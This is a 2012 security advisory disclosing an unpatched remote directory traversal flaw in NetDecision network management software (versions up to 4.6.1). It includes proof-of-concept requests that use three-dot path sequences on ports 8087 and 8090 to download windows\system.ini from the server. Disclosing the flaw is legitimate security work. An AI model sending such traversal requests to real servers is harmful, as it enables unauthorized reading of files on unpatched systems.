####################################################################### Luigi Auriemma Application: NetDecision http://www.netmechanica.com/products/?cat_id=2 Versions: <= 4.6.1 Platforms: Windows Bug: directory traversal Exploitation: remote Date: 07 Mar 2012 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== NetDecision is a network management software. ####################################################################### ====== 2) Bug ====== Directory traversal in the "NetDecision-HTTP-Server" component used by the system services TrafficGrapherServer and NOCVisionServer listening on ports 8087 and 8090. The bug is exploitable through the usage of 3 dots and allows to download the files located on the disk where is installed the software. ####################################################################### =========== 3) The Code =========== http://aluigi.org/mytoolz/mydown.zip mydown http://SERVER:8087/...\...\...\...\...\...\windows\system.ini mydown http://SERVER:8090/.../.../.../.../.../.../windows/system.ini ####################################################################### ====== 4) Fix ====== No fix. #######################################################################